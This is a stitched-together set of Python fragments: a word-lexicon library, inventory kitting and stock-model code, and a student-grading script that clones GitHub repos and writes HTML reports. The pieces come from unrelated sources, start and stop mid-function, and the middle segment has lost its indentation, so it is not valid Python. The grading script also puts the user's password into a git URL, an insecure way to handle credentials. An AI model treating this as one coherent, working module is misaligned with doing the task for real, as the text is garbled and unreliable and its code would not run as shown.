    operator: resolve the object, split the assigned value into
    (txt, num), and create the word.
    """
    root = self._subjected.lex.root_lex
    target_obj = root[key]
    txt, num = self.extract_txt_num(value, {})
    root.create_word(
        sbj=self._subjected,
        vrb=self._verbed,
        obj=target_obj,
        num=num,
        txt=txt,
        *self._args,
        **self._kwargs
    )
def __getitem__(self, item):
    """
    Square-bracket sentence extraction from its lex (the R in CRUD).

    This is the result of the curried expression:
        w = lex[s](v)[o]
    Specifically, the right-most square-bracket operator.

    So o can be:
        an object word
        idn of an object
        txt of a defined object

    This also handles the creation of a new word (the C in CRUD):
        w = lex[s](v, t, n)[o]
    Without the assignment there may be a warning about code having no effect.

    Raises:
        TypeError: item is a byte string (object names must be unicode).
        NotExist: no extra args were given and no matching word exists.
    """
    if isinstance(item, six.binary_type):
        raise TypeError("Object name must be unicode, not " + repr(item))
    objected = self._subjected.lex.root_lex[item]
    if self._args or self._kwargs:
        # Extra arguments mean "create": extract (txt, num) from them.
        txt, num = self.extract_txt_num(self._args, self._kwargs)
        # NOTE(review): extract_txt_num() pops 'txt'/'num' out of
        # self._kwargs in place, so the pass-through below should no
        # longer contain them — confirm no duplicate-keyword risk.
        return self._subjected.lex.root_lex.create_word(
            sbj=self._subjected,
            vrb=self._verbed,
            obj=objected,
            num=num,
            txt=txt,
            *self._args,
            **self._kwargs
        )
    else:
        # Plain read: look up the existing sbj-vrb-obj word.
        existing_word = self._subjected.lex.word_class()
        does_exist = self._subjected.lex.populate_word_from_sbj_vrb_obj(
            existing_word,
            sbj=self._subjected,
            vrb=self._verbed,
            obj=objected,
        )
        if not does_exist:
            raise self._subjected.NotExist(
                "There is no word type '{word}' such that:\n"
                "    sbj={sbj}\n"
                "    vrb={vrb}\n"
                "    obj={obj}\n"
                "in this {lex} (python id {lex_python_id})".format(
                    word=self._subjected.lex.word_class.__name__,
                    sbj=self._subjected,
                    vrb=self._verbed,
                    obj=objected,
                    lex=repr(self._subjected.lex),
                    lex_python_id=id(repr(self._subjected.lex)),
                )
            )
        return existing_word
@classmethod
def extract_txt_num(cls, a, k):   # aka (args, kwargs)
    """
    Get num and/or txt from positional-arguments, and keyword-arguments.

    This is the <etc> part of lex[s](v, <etc>)[o]
    Or at least part of it.
    It's meant to remove from <etc> the num and txt if they're there,
    whether they're keyword-arguments or not.
    But also leave behind other keyword arguments to pass through.
    Consumed positional arguments are deleted from `a` in place (when
    `a` is a list); consumed 'txt'/'num' keys are popped from `k`.

    TypeError if ambiguous or unsupportable.
    Examples that will raise TypeError:
        extract_txt_num('text', 'more text')
        extract_txt_num(1, 42)
        extract_txt_num(neither_text_nor_number)

    Expects a (args) is a list, not a tuple, so it can be modified in-place.
    :return: (txt, num) as (Text, Number); defaults are ('', 1).
    """
    # TODO: It was silly to expect a (args) to be a list.
    #       Only k (kwargs) can have surplus parameters.
    #       If this function doesn't generate an exception,
    #       then it used up all of a (args) anyway.
    if isinstance(a, tuple):
        a = list(a)   # A tuple turns into a list. (Oh well, can't know what wasn't absorbed.)
    elif isinstance(a, list):
        a = a         # A list stays the same, that's what we expected, ala args
    else:
        a = [a]       # Anything else is stuffed INTO a list

    # Byte strings are rejected everywhere; txt must be unicode.
    for arg in a:
        if isinstance(arg, six.binary_type):
            raise TypeError("Expecting unicode not " + repr(arg))
    for name, value in k.items():
        if isinstance(value, six.binary_type):
            raise TypeError("Expecting " + repr(name) + " to be unicode not " + repr(value))

    def type_code(x):
        # One character per positional arg: 'n'=number, 't'=text, 'x'=neither.
        return 'n' if Number.is_number(x) else 't' if Text.is_valid(x) else 'x'

    pats = ''.join(type_code(arg) for arg in a)   # pats: Positional-Argument Types
    t = 'txt' in k
    n = 'num' in k

    def type_failure():
        return TypeError("Expecting a num and a txt, not {} {} {} {} {}".format(
            repr(a), repr(k), pats, t, n
        ))

    # Exhaustive dispatch over every legal combination of positional
    # types (pats) and keyword flags (t, n); anything else is ambiguous.
    if   pats == ''   and not t and not n:   r = ''          , 1
    elif pats == 'n'  and not t and not n:   r = ''          , a[0]        ; del a[0]
    elif pats == 't'  and not t and not n:   r = a[0]        , 1           ; del a[0]
    elif pats == ''   and     t and not n:   r = k.pop('txt'), 1
    elif pats == ''   and not t and     n:   r = ''          , k.pop('num')
    elif pats == 'tn' and not t and not n:   r = a[0]        , a[1]        ; del a[0:2]
    elif pats == 'nt' and not t and not n:   r = a[1]        , a[0]        ; del a[0:2]
    elif pats == 't'  and not t and     n:   r = a[0]        , k.pop('num'); del a[0]
    elif pats == 'n'  and     t and not n:   r = k.pop('txt'), a[0]        ; del a[0]
    elif pats == ''   and     t and     n:   r = k.pop('txt'), k.pop('num')
    else:
        raise type_failure()

    try:
        return Text(r[0]), Number(r[1])
    except ValueError:
        raise type_failure()
class Lex(object):
"""
Collection of Number-identified Words.
A Lex instance conceptually contains many Word instances.
Each word is identified by a Number: word.idn
Each Lex instance is associated with a unique subclass of Word.
Each word in the lex is an instance of the subclass.
meta_word is part of a relationship between a parent and child lex.
A parent lex contains a word that represents a child lex.
That is the child's meta_word. It is passed to the constructor of the child lex.
Then the idn of that meta_word is called the meta_idn.
The meta_idn is all the parent lex needs to refer to the child lex.
The parent lex uses the meta_idn to refer to the child lex.
The parent lex uses a suffixed Number to identify a word in the child lex.
The root of that number is the meta_idn
The payload of the suffix is an idn for a word in the child lex
Meta and mesa are opposites, up and down the hierarchy of lexes.
(this is not an inheritance hierarchy)
This hierarchy was invented so a Listing can reconstruct the suffixed idn
needed in the LexSentence words that REFER to Listing words.
Each lex instance keeps track of its child lexes in a dictionary: lex.mesa_lexes.
key - meta_idn, the identifier that represents the child lex
value - child lex instance
SEE: mesa, opposite of meta, https://english.stackexchange.com/a/22805/18673
"""
# TODO: Rename meta -> parent, mesa -> child? Less confusing?
def __init__(self, meta_word=None, word_class=None, **_):
    """
    Construct a Lex and register it with its root lex.

    meta_word: word in the PARENT lex representing this (child) lex,
        or None for a root lex.
    word_class: Word subclass whose instances this lex produces; when
        None a fresh subclass is created per lex.
    **_: surplus keyword arguments are deliberately ignored.

    Raises:
        LexMetaError: meta_word is already registered for another lex.
    """
    super(Lex, self).__init__()
    # NOTE: Blow off unused kwargs here, which might be sql credentials.
    #       Guess we do this here so sql credentials could contain word_class=Something.
    if word_class is None:
        # Each lex gets a private Word subclass, so the class-level
        # `lex` attribute set below is not shared between lexes.
        class WordClassJustForThisLex(Word):
            pass
        self.word_class = WordClassJustForThisLex
    else:
        self.word_class = word_class
    self.word_class.lex = self
    self.meta_word = meta_word
    self.mesa_lexes = dict()
    # Register this lex in the ROOT lex's child table.
    root_lexes = self.root_lex.mesa_lexes
    if meta_word in root_lexes:
        # NOTE(review): this membership test uses the word itself, while
        # the keys stored below are idns (or None) — confirm the
        # duplicate check works as intended.
        raise self.LexMetaError(
            "Meta Word {this_word} already used for {that_class}. "
            "Not available for this {this_class}".format(
                this_word=repr(meta_word),
                that_class=repr(root_lexes[meta_word]),
                this_class=repr(self)
            )
        )
    meta_idn = None if meta_word is None else meta_word.idn
    root_lexes[meta_idn] = self
class LexMetaError(TypeError):
    """Something is wrong with Lex meta words, e.g. two sub-lexes use the same meta word.

    Raised from Lex.__init__ while registering the lex under its meta word.
    """
def __repr__(self):
    """
    Class name, plus the meta word (if any) identifying this lex.

    EXAMPLE:  GoogleQikiListing Word('google user')
    EXAMPLE:  AnonymousQikiListing Word('anonymous')
    """
    name = type_name(self)
    if self.meta_word is None:
        return name
    return "{} {}".format(name, repr(self.meta_word))
def __getitem__(self, item):
    """
    Square-bracket syntax Word factory.

    This gets called when you do either of these
        lex[idn]
        lex[word]   (a copy constructor)

    Delegates entirely to read_word().
    """
    return self.read_word(item)
class NotFound(Exception):
    """Raised by read_word() when an idn cannot be resolved to a word/lex."""
    pass
@property
def root_lex(self):
    # Property wrapper over _root_lex() so subclasses share one code path.
    return self._root_lex()
def _root_lex(self):
    """Walk meta_word links upward to the ancestral (root) lex."""
    if self.meta_word is None:
        # No parent: this lex is itself the root.
        return self
    if self.meta_word.lex is None:
        return self
    else:
        # noinspection PyProtectedMember
        is_meta_word_from_the_same_lex = (
            self.meta_word.lex is self or
            self.meta_word.lex._root_lex is self._root_lex
        )
        # NOTE(review): the second operand compares two freshly created
        # bound-method objects with `is`, which is always False in
        # CPython, so only the `is self` test can trigger — confirm
        # whether calling `._root_lex()` on both sides was intended.
        if is_meta_word_from_the_same_lex:
            # NOTE: This kind of self-reference should never happen.
            #       Avoid infinite loop anyway.
            raise RuntimeError("{} lex's meta_word refers to itself".format(type_name(self)))
        else:
            return self.meta_word.lex.root_lex   # recursion!
def read_word(self, idn_or_word_or_none):
    """
    Resolve an idn, a word, or None to a word instance.

    A suffixed idn identifies a word in a CHILD (mesa) lex: its root is
    the child's meta_idn and its suffix payload is the index within the
    child; such reads are delegated to the child lex.

    Raises:
        Lex.NotFound: the idn is suffixed but is not a valid Listing
            compound, or its parent lex is not registered.
    """
    if idn_or_word_or_none is None:
        return self.word_class(None)
    idn = self.idn_ify(idn_or_word_or_none)
    assert isinstance(idn, Number)
    if idn is None:
        return self.word_class(idn_or_word_or_none)
        # NOTE: May never happen, idn_ify() returning None is a freakish outcome.
    if idn.is_suffixed():
        # Compound idn: split into (parent meta_idn, index in child lex).
        try:
            meta_idn, index = Listing.split_compound_idn(idn)
            # TODO: Don't just try unsuffixed. Try all sub-suffixed numbers.
            #       Allowing nested lexes.
        except (Listing.NotAListing, KeyError) as e:
            raise Lex.NotFound("{q} is not a Listing idn: {e}".format(
                q=idn.qstring(),
                e=type_name(e) + " - " + str(e),
            ))
        else:
            try:
                lex = self.root_lex.mesa_lexes[meta_idn]
            except KeyError:   # as ke:
                raise Lex.NotFound(
                    "Can't find the Listing's parent Lex {meta_idn}, {index}".format(
                        meta_idn=meta_idn,
                        index=index,
                    )
                )
            else:
                return lex.read_word(index)   # parent read delegating to child read
    else:
        # Plain idn: a word in THIS lex.
        return self.word_class(idn)
def populate_word_from_idn(self, word, idn):
# | |
kit_item in kit_items:
# How much of this supply_item is required per kit?
one_kit = kit_item.quantity * packs[kit_item.item_pack_id]
# How much is required for all Kits?
required = one_kit * quantity
# What stock do we have for this item?
ritem_id = kit_item.item_id
rows = wh_items.find(lambda row: row["inv_inv_item.item_id"] == ritem_id)
# Group by inv_item_id
inv_items = {}
for row in rows:
inv_item_id = row["inv_inv_item.id"]
if inv_item_id in inv_items:
inv_items[inv_item_id].append(row)
else:
inv_items[inv_item_id] = [row]
for inv_item_id in inv_items:
append(inv_item_id)
binned_quantity = 0
bins = inv_items[inv_item_id]
inv_item = bins[0].inv_inv_item
if inv_item.expiry_date:
if expiry_date is None:
# No expiry date set so this item starts the list
expiry_date = inv_item.expiry_date
else:
# Shorten the expiry date if less than for previous items
if inv_item.expiry_date < expiry_date:
expiry_date = inv_item.expiry_date
# How many of this item can we use for these kits?
inv_quantity = inv_item.quantity
pack_quantity = packs[inv_item.item_pack_id]
inv_amount = inv_quantity * pack_quantity
# How many of this item will we use for the kits?
if inv_amount > required:
# Use only what is required
inv_amount = required
inv_quantity -= (inv_amount / pack_quantity)
else:
# We use all
inv_quantity = 0
if len(bins) > 1:
# Multiple Bins
binned_quantity = 0
inv_bins = [row.inv_inv_item_bin for row in bins]
# Optimise to minimise the number of Bins remaining for an Item
inv_bins.sort(key = itemgetter("quantity"))
for inv_bin in inv_bins:
bin_quantity = inv_bin.quantity
binned_quantity += bin_quantity
bin_amount = bin_quantity * pack_quantity
# How many from this bin will we use for the kits?
if bin_amount > required:
# Use only what is required
bin_amount = required
bin_quantity -= (bin_amount / pack_quantity)
else:
# We use all
bin_quantity = 0
# Update the Bin
db(ib_id_field == inv_bin.id).update(quantity = bin_quantity)
# Add to Pick List
insert(kitting_id = kitting_id,
item_id = ritem_id,
item_pack_id = inv_item.item_pack_id,
item_source_no = inv_item.item_source_no,
quantity = bin_amount,
inv_item_id = inv_item_id,
layout_id = inv_bin.layout_id,
)
# Update how much is still required
required -= bin_amount
if not required:
# No more required: move on to the next inv_item_id
break
if binned_quantity < inv_quantity:
# We still have some unbinned to take from
unbinned_quantity = inv_quantity - binned_quantity
unbinned_amount = unbinned_quantity * pack_quantity
# How many of this will we use for the kits?
if unbinned_amount > required:
# Use only what is required
unbinned_amount = required
#else:
# # We use all
# Add to Pick List
insert(kitting_id = kitting_id,
item_id = ritem_id,
item_pack_id = inv_item.item_pack_id,
item_source_no = inv_item.item_source_no,
quantity = unbinned_amount,
inv_item_id = inv_item_id,
#layout_id = None,
)
# Update how much is still required
required -= unbinned_amount
else:
inv_bin = bins[0].inv_inv_item_bin
layout_id = inv_bin.layout_id
if layout_id:
# Single Bin
# Update the Bin
db(ib_id_field == inv_bin.id).update(quantity = inv_quantity)
#else:
# # Unbinned
# Add to Pick List
insert(kitting_id = kitting_id,
item_id = ritem_id,
item_pack_id = inv_item.item_pack_id,
item_source_no = inv_item.item_source_no,
quantity = inv_amount,
inv_item_id = inv_item_id,
layout_id = layout_id,
)
# Update how much is still required
required -= inv_amount
# Update Inv Quantity
db(ii_id_field == inv_item_id).update(quantity = inv_quantity)
if not required:
# No more required: move on to the next kit_item
break
# Add Kits to Stock
# @ToDo: Keep track of Donor? Owner?
# @ToDo: Update Pack Value
new_id = iitable.insert(site_id = site_id,
item_id = item_id,
item_pack_id = item_pack_id,
quantity = quantity,
expiry_date = expiry_date,
)
# supply_item_entity
s3db.update_super(iitable, {"id": new_id})
if current.deployment_settings.get_inv_stock_cards():
append(new_id)
inv_stock_card_update(inv_item_ids,
comments = "Kitting",
)
# =============================================================================
class InventoryMinimumModel(S3Model):
    """
    Manage Minimum Stock levels for Sites

    Used by: RMS
    """

    names = ("inv_minimum",
             )

    def model(self):
        """Define the inv_minimum table: a (site, item, quantity) triple."""

        T = current.T
        auth = current.auth

        WAREHOUSE = T(current.deployment_settings.get_inv_facility_label())

        # ---------------------------------------------------------------------
        # Minimum Stock Levels
        #
        tablename = "inv_minimum"
        self.define_table(tablename,
                          # This is a component, so needs to be a super_link
                          # - can't override field name, ondelete or requires
                          # Defaults to the logged-in user's own site.
                          self.super_link("site_id", "org_site",
                                          default = auth.user.site_id if auth.is_logged_in() else None,
                                          empty = False,
                                          label = WAREHOUSE,
                                          instance_types = auth.org_site_types,
                                          # Hide obsolete sites from the selector.
                                          not_filterby = "obsolete",
                                          not_filter_opts = (True,),
                                          ondelete = "CASCADE",
                                          represent = self.org_site_represent,
                                          readable = True,
                                          writable = True,
                                          updateable = True,
                                          # Comment these to use a Dropdown & not an Autocomplete
                                          #widget = S3SiteAutocompleteWidget(),
                                          #comment = DIV(_class = "tooltip",
                                          #              _title = "%s|%s" % (WAREHOUSE,
                                          #                                  messages.AUTOCOMPLETE_HELP)),
                                          ),
                          self.supply_item_id(ondelete = "RESTRICT",
                                              required = True,
                                              ),
                          # Minimum quantity to keep on hand (non-negative).
                          Field("quantity", "double", notnull=True,
                                default = 0.0,
                                label = T("Quantity"),
                                represent = lambda v: \
                                            IS_FLOAT_AMOUNT.represent(v, precision=2),
                                requires = IS_FLOAT_AMOUNT(minimum=0.0),
                                ),
                          s3_comments(),
                          *s3_meta_fields()
                          )

        # CRUD strings
        current.response.s3.crud_strings[tablename] = Storage(
            label_create = T("Add Minimum Stock Level"),
            title_display = T("Minimum Stock Level Details"),
            title_list = T("Minimum Stock Levels"),
            title_update = T("Edit Minimum Stock Level"),
            label_list_button = T("List Minimum Stock Levels"),
            label_delete_button = T("Delete Minimum Stock Level"),
            msg_record_created = T("Minimum Stock Level added"),
            msg_record_modified = T("Minimum Stock Level updated"),
            msg_record_deleted = T("Minimum Stock Level deleted"),
            msg_list_empty = T("No Minimum Stock Levels currently registered"),
            )

        # No names exported to s3.* for this model.
        return {}
# =============================================================================
class InventoryOrderItemModel(S3Model):
    """
    Simple Item Ordering for fulfilment of Inventory Requisitions
    - for when Procurement model isn't being used
    """

    names = ("inv_order_item",
             )

    def model(self):
        """Define the inv_order_item table linking req items to purchases."""

        T = current.T

        # -----------------------------------------------------------------
        # Request Item Ordering
        #
        tablename = "inv_order_item"
        self.define_table(tablename,
                          # Source requisition line; hidden in forms.
                          self.inv_req_item_id(empty = False,
                                               readable = False, # Hidden
                                               writable = False,
                                               ),
                          self.inv_req_id(empty = False,
                                          writable = False, # Auto-populated
                                          ),
                          self.supply_item_id(empty = False,
                                              writable = False, # Auto-populated
                                              ),
                          self.supply_item_pack_id(writable = False, # Auto-populated
                                                   ),
                          Field("quantity", "double", notnull=True,
                                default = 0.0,
                                label = T("Quantity"),
                                represent = lambda v: \
                                            IS_FLOAT_AMOUNT.represent(v, precision=2),
                                #requires = IS_FLOAT_AMOUNT(minimum=0.0),
                                writable = False, # Auto-populated
                                ),
                          # Purchase Order reference; label uses the
                          # deployment's procurement shortname.
                          Field("purchase_ref",
                                label = T("%(PO)s Number") % \
                                        {"PO": current.deployment_settings.get_proc_shortname()},
                                represent = lambda v: v if v else NONE,
                                ),
                          self.inv_recv_id(label = T("Received Shipment"),
                                           ),
                          *s3_meta_fields())

        # Records are only created programmatically, never via CRUD forms.
        self.configure(tablename,
                       insertable = False,
                       )

        # CRUD strings
        current.response.s3.crud_strings[tablename] = Storage(
            #label_create = T("Create Purchase Item"),
            title_display = T("Purchase Item Details"),
            title_list = T("Purchase Items"),
            title_update = T("Edit Purchase Item"),
            label_list_button = T("List Purchase Items"),
            label_delete_button = T("Delete Purchase Item"),
            #msg_record_created = T("Purchase Item Added"),
            msg_record_modified = T("Purchase Item Updated"),
            msg_record_deleted = T("Purchase Item Deleted"),
            msg_list_empty = T("No Purchase Items"),
            )

        # ---------------------------------------------------------------------
        # Pass names back to global scope (s3.*)
        #
        return {}
# =============================================================================
class InventoryPackageModel(S3Model):
"""
Packages (Boxes & Pallets)
https://en.wikipedia.org/wiki/Pallet
"""
names = ("inv_package",
"inv_package_id",
)
def model(self):
T = current.T
db = current.db
is_float_represent = IS_FLOAT_AMOUNT.represent
float_represent = lambda v: is_float_represent(v, precision=3)
package_type_opts = {"BOX": T("Box"),
"PALLET": T("Pallet"),
}
# -----------------------------------------------------------------
# Packages
#
tablename = "inv_package"
self.define_table(tablename,
Field("type", length=8,
default = "PALLET",
label = T("Type"),
represent = s3_options_represent(package_type_opts),
requires = IS_IN_SET(package_type_opts,
zero = None,
),
),
Field("name", length=64, notnull=True,
label = T("Name"),
requires = [IS_NOT_EMPTY(),
IS_LENGTH(64),
]
),
Field("width", "double",
default = 0.0,
label = T("Width"),
represent = float_represent,
comment = "m",
),
Field("length", "double",
default = 0.0,
label = T("Length"),
represent = float_represent,
comment = "m",
),
Field("depth", "double",
default = 0.0,
label = T("Depth"),
represent = float_represent,
comment = "m",
),
Field("weight", "double",
default = 0.0,
label = T("Weight"),
represent = float_represent,
comment = "kg",
),
Field("load_capacity", "double",
default = 0.0,
label = T("Load Capacity"),
represent = float_represent,
comment = "kg",
),
Field("max_height", "double",
default = 0.0,
label = T("Maximum Height (m)"),
represent = float_represent,
comment = T("Including the Package"),
),
Field("max_volume", "double",
default = 0.0,
label = T("Maximum Volume"),
represent = float_represent,
comment = "m3",
writable = False,
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
current.response.s3.crud_strings[tablename] = Storage(
label_create = T("Create Package"),
title_display = T("Package Details"),
title_list = T("Packages"),
title_update = T("Edit Package"),
label_list_button = T("List Packages"),
label_delete_button = T("Delete Package"),
msg_record_created = T("Package Added"),
msg_record_modified = T("Package Updated"),
msg_record_deleted = T("Package Deleted"),
msg_list_empty = T("No Packages defined"),
)
self.configure(tablename,
onaccept = self.inv_package_onaccept,
)
# Reusable Field
represent = inv_PackageRepresent()
package_id = S3ReusableField("package_id", "reference %s" % tablename,
label = T("Package Type"),
ondelete = "RESTRICT",
represent = represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_package.id",
represent,
orderby = "inv_package.name",
sort = True,
)
),
sortby = "name",
)
# ---------------------------------------------------------------------
        # Pass names back to global scope (s3.*)
# <gh_stars>0
import sys, os, time, subprocess, getpass
from datetime import date
from subprocess import Popen, PIPE, STDOUT
import loadStudents
import argparse
import scorehistory
import javaRun
from shutil import copyfile
# ---------------------------------------------------------------------------
# Command-line interface and one-time script setup.
PARSER = argparse.ArgumentParser()
PARSER.add_argument("project", help="Github project to pull.")
PARSER.add_argument("-a", "--assignment", help="Assignment within the project.")
PARSER.add_argument("-s", "--student", help="Only on the student specified.")
PARSER.add_argument("-dl", "--dl", help="Skip source DL, use -dl off, defaults to on")
args = PARSER.parse_args()

# Source download defaults to ON; pass "-dl off" to disable it.
SHOULD_DL = True
if args.dl is not None:  # BUG FIX: was "not args.dl == None" (use identity test for None)
    if args.dl.lower() == "off":
        SHOULD_DL = False
if SHOULD_DL:
    print("Mode: Download source ON")
else:
    print("Mode: Download source OFF")

# If a specific student was specified then only that student will be run
STUDENTS = loadStudents.getStudents(args.student)

# github URL patterns, e.g.
#   https://github.com/SwettSoquelHS/<project>-<studentGithubUser>
#   https://github.com/SwettSoquelHS/<project>-<studentGithubUser>.git
HTTPS_STR = "https://"
GITHUB_PROJ_BASE_URL= "github.com/SwettSoquelHS/"
# Base URL of the students' live GitHub Pages demos
GITHUB_DEMO_BASE_URL = "swettsoquelhs.github.io/"
OUTPUT_DIR = './stuwork'
REPORT_DIR = './stureports'
TESTS_DIR = './tests'
REPORTS = "github.com/SwettSoquelHS/reports.git"

# Assignment (optional) and project selected on the command line
assignment = args.assignment
projName = args.project
OK_TO_REUSE = True       # reuse previously downloaded student checkouts
stu_to_report = {}       # student github user -> relative report path

# NOTE(review): argparse has already consumed sys.argv above; this raw peek
# at sys.argv[2] predates argparse and may not hold a student name -- confirm.
specificUser = None
if len(sys.argv) > 2:
    specificUser = sys.argv[2]

# Score history for this project (used later to flag score changes)
scoreHistory = projName + ".json"
scorehistory.load(scoreHistory)

# Credentials for cloning/pushing (password is never echoed)
sysUser = input("Enter the git user:")
sysPwd = getpass.getpass(prompt='Enter github pwd for '+ sysUser +'? ')

# Ensure the per-project report directory exists (idempotent)
os.makedirs(REPORT_DIR + "/" + projName, exist_ok=True)
def gitPull():
    """Run ``git pull`` in the reports checkout (REPORT_DIR).

    check_output raises CalledProcessError on a non-zero exit status, so a
    failed pull propagates instead of being silently ignored.
    """
    # BUG FIX: removed the pointless "if True:" wrapper and the unused
    # "output" binding from the original.
    subprocess.check_output(['git', 'pull'], cwd=REPORT_DIR,
                            stderr=subprocess.STDOUT)
def saveReportToGit(stu_to_report, reportFile):
    """Commit everything under REPORT_DIR and push it to the reports repo.

    stu_to_report -- student -> report path map (currently unused here)
    reportFile    -- report file name (currently unused here)

    NOTE(review): relies on the module-level names ``studentReport`` and
    ``studentGithubUser`` being set by the main grading loop before this is
    called -- confirm; neither is a parameter of this function.
    The push URL embeds sysUser/sysPwd credentials.
    """
    # BUG FIX: removed the pointless "if True:" wrapper from the original.
    stuCode = makeProjURL(HTTPS_STR+GITHUB_PROJ_BASE_URL, projName, studentGithubUser)
    printToReport(studentReport, "[Attempting DL:" + stuCode + ".git]")
    gitURL = HTTPS_STR + sysUser + ":" + sysPwd + "@" + REPORTS
    # Stage, commit, and push the whole reports checkout.
    output = subprocess.check_output(['git', 'add', "."], cwd=REPORT_DIR,
                                     stderr=subprocess.STDOUT)
    output = subprocess.check_output(['git', 'commit', '-m "report check in ' + str(date.today()) + '"'],
                                     cwd=REPORT_DIR,
                                     stderr=subprocess.STDOUT)
    output = subprocess.check_output(['git', 'push', gitURL], cwd=REPORT_DIR,
                                     stderr=subprocess.STDOUT)
    printToReport(studentReport, output.decode("utf-8").replace("\n", "\n\t"))
    printToReport(studentReport, "[REPORT DONE]")
#<td>Student Code Base</td><td>Live Demo</td> <td>Report</td>
def printTR(displayCodeBaseStr, codeURL, liveDisplay, liveURL, stuReport, theScore):
    """Build one HTML table row: code link, live-demo link, report link, score.

    displayCodeBaseStr/codeURL -- text and href of the student's repo link
    liveDisplay/liveURL        -- live-demo cell; 'N/A' renders a plain cell
    stuReport                  -- relative report path, or None for N/A
    theScore                   -- score cell contents, or None to omit it

    BUG FIX: the original emitted mismatched </td> tags -- an extra close
    after the 'N/A' report cell when theScore was None, and no close for the
    report-link cell when a score was present.  Cells are now always balanced.
    """
    result = '<tr><td><a href="' + codeURL + '">' + displayCodeBaseStr + "</a></td>"
    if liveDisplay != 'N/A':
        result += '<td><a href="' + liveURL + '">' + liveDisplay + '</a></td>'
    else:
        result += '<td> N/A </td>'
    if stuReport is None:
        result += '<td> N/A </td>'
    else:
        result += '<td><a href="' + stuReport + '">Report Results</a></td>'
    if theScore is not None:
        result += '<td>' + str(theScore) + '</td>'
    return result + '</tr>'
def makeProjURL(base, proj, user):
    """Return the per-student repository URL: ``<base><proj>-<user>``."""
    return f"{base}{proj}-{user}"
def createClassReport(projName, stu_report_map, liveDemo, scores ):
    """Write the class-level HTML summary page and return its file path.

    projName       -- project name; used for the file name and repo links
    stu_report_map -- maps student github user -> relative report path
    liveDemo       -- if not None, a live-demo link column is generated
    scores         -- optional {user: {assignment: score}} map; when given,
                      per-assignment score columns are added and the file
                      gets an 'admin-' prefix
    """
    #scores looks like:
    #{'user': { 'assign name': score}}
    print("[FINALIZING] Running " + projName + " summary...")
    reportFile = projName + ".html"
    if not (scores is None):
        reportFile = "admin-" + reportFile
    reportFile = REPORT_DIR + "/" + reportFile
    scoreHeaderStr = ''
    if scores is not None:
        #{'asianaaron2': {'asignment_1': '0.55'}
        # NOTE(review): the header row is built from the FIRST student's
        # assignment keys only -- assumes every student has the same set.
        for student in scores.keys():
            stuScores = scores[student]
            for asignmentKey in stuScores.keys():
                scoreHeaderStr = scoreHeaderStr + '<td>' + asignmentKey + '</td>'
            break
        scoreHeaderStr = scoreHeaderStr + "\n"
    with open(reportFile , "w") as file:
        file.write("<html><head><title>"+projName + " class report</title></head><body>")
        file.write("<table><tr><td>Student Code Base</td><td>Live Demo</td> <td>Report</td>")
        if scores is None:
            file.write(" </tr>")
        else:
            file.write(scoreHeaderStr + "</tr>")
        # One table row per student (STUDENTS is module-level)
        for student in STUDENTS:
            studentGit = student[2]  # github user name
            stuName = student[0]     # display name
            stuCode = makeProjURL(HTTPS_STR+GITHUB_PROJ_BASE_URL, projName, studentGit)
            stuSite ='N/A'
            if liveDemo != None:
                stuSite = makeProjURL(HTTPS_STR+GITHUB_DEMO_BASE_URL, projName, studentGit)
            stuReport = None
            if studentGit in stu_report_map.keys():
                stuReport = stu_report_map[studentGit]
            theScore = None
            tdData = ""
            if not (scores is None):
                cnt = 0;
                for asg in scores[studentGit].keys():
                    theScore = scores[studentGit][asg]
                    oldScore = scorehistory.getPrevScore(asg, studentGit)
                    # Flag any difference from the previously recorded score
                    if theScore != oldScore and not(oldScore is None):
                        theScore = 'WAS: ' + str(oldScore) + ' vs NOW: ' + str(theScore)
                    if cnt == 0:
                        tdData = theScore
                    else:
                        tdData = tdData + "</td><td>" +theScore
                    cnt = cnt + 1
            #def printTR( display, codeURL, liveDisplay, liveURL, stuReport):
            stuRow = printTR(stuName, stuCode, stuSite, stuSite, stuReport, tdData )
            file.write(stuRow)
        # NOTE(review): closing tag is '<html>' rather than '</html>' --
        # pre-existing typo in the generated markup.
        file.write("</table></body><html>")
    return reportFile
def printToReport(log_list, message):
    """Echo *message* to stdout and append it to the report log *log_list*."""
    print(message)
    log_list.append(message)
#writeStudentResultReport(student[2], projName, REPORT_DIR , studentReport)
def writeStudentResultReport(student, project, out_dir, log_data):
    """Write one student's HTML results page and return its relative path.

    student  -- the student's github user name
    project  -- project name (used in the file name and page body)
    out_dir  -- report root directory; out_dir/<project>/ must already exist
    log_data -- list of log lines to embed in a <pre> block

    Returns "<project>/<student>.<project>_results.html" (relative to out_dir).

    BUG FIX: the original built the path from the module-level global
    ``projName`` instead of the ``project`` parameter (they happened to be
    equal at the call site); it also called close() redundantly inside the
    ``with`` block.
    """
    relPath = project + "/" + student + "." + project + "_results.html"
    reportFile = out_dir + "/" + relPath
    with open(reportFile, "w") as file_obj:
        today = str(date.today())
        file_obj.write("<html><head><title>" + project + " status</title></head><body>\n")
        file_obj.write("Run date: " + today + "\n<br>")
        file_obj.write("Student User: " + student + "\n<br>")
        file_obj.write("Project: " + project + "\n<br>\n<pre>\n")
        for logLine in log_data:
            file_obj.write(logLine + "\n")
        file_obj.write("\n</pre></body></html>")
    return relPath
def checkClean(studentProjectDirectory, studentReport, studentWorkingDirectory):
    """Prepare the student's project directory according to OK_TO_REUSE.

    When OK_TO_REUSE is False an existing checkout is deleted so a fresh
    clone can be made; when True an existing checkout is reused.  What
    happened is logged to studentReport, then the function pauses briefly.
    """
    if not OK_TO_REUSE:
        if os.path.exists(studentProjectDirectory):
            printToReport(studentReport, "[CLEANUP] Removing project dir: " + studentProjectDirectory)
            # BUG FIX: the original passed the undefined name ``stuProj``
            # to rm -rf, which raised NameError on this path.
            Popen(['rm', '-rf', studentProjectDirectory], cwd=studentWorkingDirectory)
        else:
            printToReport(studentReport, "[FRESH & CLEAN] @ " + studentProjectDirectory)
    else:
        if os.path.exists(studentProjectDirectory):
            printToReport(studentReport, "[REUSING WORK]: " + studentProjectDirectory)
        else:
            printToReport(studentReport, "[PRE-WARN]: Expected non-empty: " + studentProjectDirectory)
    # Brief pause so the message is readable (and rm can get started).
    time.sleep(1.5)
def syncGitBase(projName, studentGithubUser, studentReport, studentWorkingDirectory):
    """Clone the student's repository for *projName* into the work directory.

    The clone URL embeds the module-level sysUser/sysPwd credentials.
    Failures are logged but do not abort the whole grading run.
    """
    try:
        stuCode = makeProjURL(HTTPS_STR+GITHUB_PROJ_BASE_URL, projName, studentGithubUser)
        printToReport(studentReport, "[Attempting DL:" + stuCode + ".git]")
